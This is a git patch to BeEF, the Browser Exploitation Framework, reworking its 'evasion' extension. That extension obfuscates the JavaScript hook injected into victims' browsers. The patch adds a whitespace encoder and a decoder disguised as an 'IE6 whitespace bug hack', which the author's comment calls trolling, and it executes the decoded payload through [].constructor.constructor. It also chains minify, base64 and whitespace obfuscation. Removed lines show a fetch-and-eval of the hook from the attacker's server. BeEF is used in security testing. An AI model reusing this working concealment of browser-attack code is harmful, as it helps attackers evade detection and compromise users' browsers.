From e86712413ca64d0c9f0a646ad1481320680153b9 Mon Sep 17 00:00:00 2001
From: Jean-Louis Huynen <huynenjl@gmail.com>
Date: Wed, 29 Aug 2012 18:22:22 +0200
Subject: [PATCH] modified whitespace evasion technique to keep it simple -
 modified beefjs (just one line, i don't had much time to investigate my
 change but it seems to work better with it than without it :)

---
 core/main/handlers/modules/beefjs.rb         |  3 +-
 extensions/evasion/config.yaml               |  5 +-
 extensions/evasion/extension.rb              |  1 +
 extensions/evasion/obfuscation/whitespace.rb | 76 ++++++++------------
 4 files changed, 35 insertions(+), 50 deletions(-)

diff --git a/core/main/handlers/modules/beefjs.rb b/core/main/handlers/modules/beefjs.rb
index 8e30ae735..38e48f05c 100644
--- a/core/main/handlers/modules/beefjs.rb
+++ b/core/main/handlers/modules/beefjs.rb
@@ -104,8 +104,7 @@ module BeEF
 
             if config.get("beef.extension.evasion.enable")
               evasion = BeEF::Extension::Evasion::Evasion.instance
-              @hook = evasion.add_bootstrapper + evasion.obfuscate(@hook)
-              @final_hook = ext_js_to_not_obfuscate + evasion.add_bootstrapper + evasion.obfuscate(ext_js_to_obfuscate) + @hook
+              @final_hook = ext_js_to_not_obfuscate + evasion.add_bootstrapper + evasion.obfuscate(ext_js_to_obfuscate + @hook) 
             else
               @final_hook = ext_js_to_not_obfuscate + @hook
             end
diff --git a/extensions/evasion/config.yaml b/extensions/evasion/config.yaml
index 712989a31..7d9db7f91 100644
--- a/extensions/evasion/config.yaml
+++ b/extensions/evasion/config.yaml
@@ -16,7 +16,7 @@
 beef:
     extension:
         evasion:
-            enable: true 
+            enable: true
             name: 'Evasion'
             authors: ["antisnatchor"]
             exclude_core_js: ["lib/jquery-1.5.2.min.js", "lib/json2.js", "lib/jools.min.js"]
@@ -26,4 +26,5 @@ beef:
               beef: "beef"
               Beef: "Beef"
               evercookie: "evercookie"
-            chain: ["scramble", "minify"]
+            #chain: ["scramble", "minify"]
+            chain: ["minify", "base64", "whitespace"]
diff --git a/extensions/evasion/extension.rb b/extensions/evasion/extension.rb
index ce1fc360e..e7e5c25d5 100644
--- a/extensions/evasion/extension.rb
+++ b/extensions/evasion/extension.rb
@@ -30,3 +30,4 @@ require 'extensions/evasion/helper'
 require 'extensions/evasion/obfuscation/scramble'
 require 'extensions/evasion/obfuscation/minify'
 require 'extensions/evasion/obfuscation/base_64'
+require 'extensions/evasion/obfuscation/whitespace'
diff --git a/extensions/evasion/obfuscation/whitespace.rb b/extensions/evasion/obfuscation/whitespace.rb
index 5f640651c..8c20217f4 100644
--- a/extensions/evasion/obfuscation/whitespace.rb
+++ b/extensions/evasion/obfuscation/whitespace.rb
@@ -20,56 +20,40 @@ module BeEF
         include Singleton
 
         def need_bootstrap
-          false
+          true
+        end
+        
+        def get_bootstrap
+        # the decode function is in plain text - called IE-spacer - because trolling is always a good idea
+        decode_function =
+"//Dirty IE6 whitespace bug hack
+function IE_spacer(css_space) {
+  var spacer = '';
+  for(y = 0; y < css_space.length/8; y++)
+  {
+    v = 0;
+    for(x = 0; x < 8; x++)
+    {
+      if(css_space.charCodeAt(x+(y*8)) > 9)
+      {
+        v++;
+      }
+      if(x != 7)
+      {
+        v = v << 1;
+      }
+    }
+    spacer += String.fromCharCode(v);
+  }return spacer;
+}"
         end
 
         def execute(input, config)
-          print_debug input.length
+          size = input.length
           encoded = encode(input)
-	        var_name = BeEF::Extension::Evasion::Helper::random_string(3)
-
-          config = BeEF::Core::Configuration.instance
-          hook = config.get("beef.http.hook_file")
-          host = config.get("beef.http.host")
-          port = config.get("beef.http.port")
-          decode_function =
-"
-//Dirty IE6 whitespace bug hack
-#{var_name} = function (){
-  jQuery.get(\'http://#{host}:#{port}#{hook}\', function callback(data) {
-    var output = '';
-    var str = '//E'+'OH';
-    var chunks = data.split(str);
-    for (var i = 0; i < chunks.length; i++)
-    {
-      if(chunks[i].substring(0,4)  == '----')
-      {
-        input = chunks[i].split('\\n');
-        input = input[0].substring(5);
-        for(y = 0; y < input.length/8; y++)
-        {
-          v = 0;
-          for(x = 0; x < 8; x++)
-          {
-	          if(input.charCodeAt(x+(y*8)) > 9)
-	          {
-		          v++;
-	          }
-	          if(x != 7)
-	          {
-		          v = v << 1;
-	          }
-          }
-          output += String.fromCharCode(v);
-        }
-      }
-    }alert(output.length);[].constructor.constructor(output)();
-  }, 'text');
-}
-#{var_name}();//EOH-----"
-
-	        input = "#{decode_function}#{encoded}"
-          print_debug "[OBFUSCATION - WHITESPACE] Javascript has been Whitespace Encoded"
+          var_name = BeEF::Extension::Evasion::Helper::random_string(3)
+          input = "var #{var_name}=\"#{encoded}\";[].constructor.constructor(IE_spacer(#{var_name}))();"
+          print_debug "[OBFUSCATION - WHITESPACE] #{size}byte of Javascript code has been Whitespaced"
           input
         end